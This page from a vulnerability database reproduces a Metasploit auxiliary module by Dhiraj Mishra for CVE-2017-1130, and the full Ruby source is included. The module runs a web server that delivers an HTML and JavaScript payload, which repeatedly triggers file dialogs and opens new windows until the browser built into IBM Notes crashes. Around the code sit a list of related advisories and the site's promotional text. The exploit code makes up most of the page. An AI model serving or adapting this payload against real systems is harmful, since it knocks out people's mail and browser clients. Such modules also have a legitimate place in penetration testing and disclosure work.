Lucene search
K

IBM Notes Denial Of Service

🗓️ 31 Aug 2024 00:00:00Reported by Dhiraj Mishra, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 160 Views

Exploiting IBM Notes Browser Vulnerability

Related
Code
ReporterTitlePublishedViews
Family
0day.today
IBM Notes 8.5.x/9.0.x - Denial of Service (2) Exploit
4 Sep 201700:00
zdt
0day.today
IBM Lotus Notes Denial Of Service Exploit
9 Nov 201700:00
zdt
Circl
CVE-2017-1130
31 Aug 201700:00
circl
CNVD
IBM Notes Denial of Service Vulnerability (CNVD-2017-25669)
6 Sep 201700:00
cnvd
CVE
CVE-2017-1130
5 Sep 201721:00
cve
Cvelist
CVE-2017-1130
5 Sep 201721:00
cvelist
Exploit DB
IBM Notes 8.5.x/9.0.x - Denial of Service (2)
31 Aug 201700:00
exploitdb
exploitpack
IBM Notes 8.5.x9.0.x - Denial of Service (2)
31 Aug 201700:00
exploitpack
Metasploit
IBM Notes Denial Of Service
10 Oct 201706:52
metasploit
NVD
CVE-2017-1130
5 Sep 201721:29
nvd
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpServer  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => "IBM Notes Denial Of Service",  
'Description' => %q(  
This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.  
If successful, the browser will crash after viewing the webpage.  
),  
'License' => MSF_LICENSE,  
'Author' => [  
'Dhiraj Mishra',  
],  
'References' => [  
['EDB', '42604'],  
[ 'CVE', '2017-1130' ]  
],  
'DisclosureDate' => '2017-08-31',  
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],  
'PassiveActions' => [ 'WebServer' ],  
'DefaultAction' => 'WebServer'  
)  
)  
end  
  
def run  
exploit # start http server  
end  
  
def setup  
@html = %|  
<html><body>  
<input type="file" id="f">  
<script>  
var w;  
var kins = {};  
var i = 1;  
f.click();  
setInterval("f.click()", 1);  
setInterval(function(){  
for (var k in kins) {  
if (kins[k] && kins[k].status === undefined) {  
kins[k].close();  
delete kins[k];  
}  
}  
w = open('data:text/html,<input type="file" id="f"><script>f.click();setInterval("f.click()", 1);<\\/script>');  
if (w) {  
kins[i] = w;  
i++;  
}  
}, 1);  
</script>  
</body></html>  
|  
end  
  
def on_request_uri(cli, _request)  
print_status('Sending response')  
send_response(cli, @html)  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation